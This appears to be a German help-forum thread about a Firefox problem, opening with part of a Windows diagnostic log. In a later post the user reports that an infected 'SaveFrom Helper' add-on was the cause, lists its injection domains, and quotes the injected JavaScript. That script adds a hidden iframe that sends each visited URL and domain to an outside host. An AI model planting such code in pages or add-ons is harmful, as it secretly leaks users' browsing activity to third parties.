Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen. Prozess-ID: 3244 Startzeit: 01d0984381d9292a Endzeit: 0 Anwendungspfad: C:\WINDOWS\Explorer.EXE Berichts-ID: e577004d-0436-11e5-be8e-a41731ec29e8 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Resetting to Probing: 16 RubensVaio.local. AAAA FE80:0000:0000:0000:D1B2:D6F0:4F33:2936 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353 16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Resetting to Probing: 16 RubensVaio.local. AAAA 2003:004B:2F48:B101:7887:BBF0:964A:28D6 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353 16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Resetting to Probing: 16 RubensVaio.local. AAAA 2003:004B:2F48:B101:D1B2:D6F0:4F33:2936 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353 16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Resetting to Probing: 4 RubensVaio.local. Addr 192.168.2.106 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353 16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478 System errors: ============= Error: (05/26/2015 06:00:15 PM) (Source: NetBT) (EventID: 4321) (User: ) Description: Der Name "WORKGROUP :1d" konnte nicht auf der Schnittstelle mit IP-Adresse 192.168.2.106 registriert werden. Der Computer mit IP-Adresse 192.168.2.102 hat nicht zugelassen, dass dieser Computer diesen Namen verwendet. Error: (05/26/2015 05:56:06 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio) Description: {1B1F472E-3221-4826-97DB-2C2324D389AE} Error: (05/26/2015 05:55:35 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio) Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} Error: (05/24/2015 07:38:03 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio) Description: {1B1F472E-3221-4826-97DB-2C2324D389AE} Error: (05/24/2015 07:37:33 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio) Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} Error: (05/23/2015 03:23:45 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio) Description: {1B1F472E-3221-4826-97DB-2C2324D389AE} Error: (05/23/2015 03:23:15 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio) Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} Error: (05/23/2015 02:05:29 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio) Description: {1B1F472E-3221-4826-97DB-2C2324D389AE} Error: (05/23/2015 02:04:59 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio) Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} Error: (05/22/2015 06:13:01 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio) Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} Microsoft Office: ========================= Error: (05/27/2015 08:15:21 AM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: 300x80040d07iehistory://{S-1-5-21-2798130160-1945478871-1923780282-1001}/ Error: (05/27/2015 08:11:53 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Explorer.EXE6.3.9600.17667324401d0984381d9292a0C:\WINDOWS\Explorer.EXEe577004d-0436-11e5-be8e-a41731ec29e8 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Resetting to Probing: 16 RubensVaio.local. AAAA FE80:0000:0000:0000:D1B2:D6F0:4F33:2936 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353 16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Resetting to Probing: 16 RubensVaio.local. AAAA 2003:004B:2F48:B101:7887:BBF0:964A:28D6 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353 16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Resetting to Probing: 16 RubensVaio.local. AAAA 2003:004B:2F48:B101:D1B2:D6F0:4F33:2936 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353 16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Resetting to Probing: 4 RubensVaio.local. Addr 192.168.2.106 Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353 16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478 ==================== Memory info =========================== Processor: Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz Percentage of memory in use: 66% Total physical RAM: 8139.28 MB Available physical RAM: 2732.42 MB Total Pagefile: 11979.28 MB Available Pagefile: 4991.53 MB Total Virtual: 131072 MB Available Virtual: 131071.77 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:1825.12 GB) (Free:1750.36 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 1863 GB) (Disk ID: 95F2A7AC) Partition: GPT Partition Type. ==================== End of log ============================ Geändert von RAnders00 (27.05.2015 um 11:15 Uhr) |
27.05.2015, 11:04 | #2 |
/// the machine /// TB-Ausbilder | Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website Hi,
__________________Logs bitte immer in Codetags in den Thread posten
__________________ |
30.05.2015, 14:36 | #3 |
| Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website Ich habe die Lösung gefunden.
__________________Ich hatte eine scheinbar infinizerte Version des Firefox-Addons "SaveFrom Helper". Ich habe das Addon entfernt, Firefox neugestartet, das Addon neu von der offiziellen Mozilla-Addon-Seite heruntergeladen und prompt ist das Problem verschwunden. Das Addon hatte JavaScript und Frames in die Seiten injektiert. Die Seiten, die in den Scripts uns Frames vorkamen, waren: (Für zukünftige user, die auf Google suchen) Code:
ATTFilter i.mgicinjs.info foxi69.tlscdn.com f.asdfzxcv1312.com endall41-q.apollocdn.com q.nadijs.info f.asdfzxcv1312.com q.mgicinjs.info Code:
ATTFilter (function(){try{if(typeof window['asdfdsasdfdsa'] === 'undefined'){setTimeout(function(){var shouldThisPartOfCodeRun = document.URL.search('http') === 0 ;if(!shouldThisPartOfCodeRun){ return;}if(typeof DealPly !== 'undefined' && typeof DealPly.serverCallParam === 'string' ){var reportFlag = true;var scArr = document.getElementsByTagName('script');for(var index in scArr){if(typeof scArr[index].src === 'string' && scArr[index].src.search('\\.js\\?dn=') !== -1){ reportFlag = false;}}if(!reportFlag ){ return;}var host = 'hxxp://q.nadijs.info/';var isSecure = document.URL.search('https://') === 0 ;if(isSecure){ host = 'https://endall41-q.apollocdn.com/';}var urlPath = 'dealdo/event-report?type=quick&';var iframe = document.createElement('iframe');var suffix = ''; try{if(typeof JavaScriptJsTagUrl !== 'undefined'){suffix = JavaScriptJsTagUrl.substr(JavaScriptJsTagUrl.search('\?') + 1 );}}catch(e324324){}iframe.setAttribute('style','position:relative; left:-10000px; width:1px; height:1px; visibility:hidden');iframe.setAttribute('src',host + urlPath + 'url=' + encodeURIComponent(document.URL) + '&domain=' + document.domain + '&topic=dpdiedarg&' + suffix );document.body.appendChild(iframe);}}, 10000);window['asdfdsasdfdsa'] = true;} }catch(e235534){}})(); FOR ENGLISH VISITORS: You have a infected version of the SaveFrom helper installed. Uninstall it and get a non-infected version from the official mozilla addon website. Geändert von RAnders00 (30.05.2015 um 14:43 Uhr) |
31.05.2015, 05:49 | #4 |
/// the machine /// TB-Ausbilder | Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website ok
__________________ gruß, schrauber Proud Member of UNITE and ASAP since 2009 Spenden Anleitungen und Hilfestellungen Trojaner-Board Facebook-Seite Keine Hilfestellung via PM! |
Themen zu Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website |
firefox, javascript, launch, mgicinjs, onedrive, plugins, savefrom, virtualbox |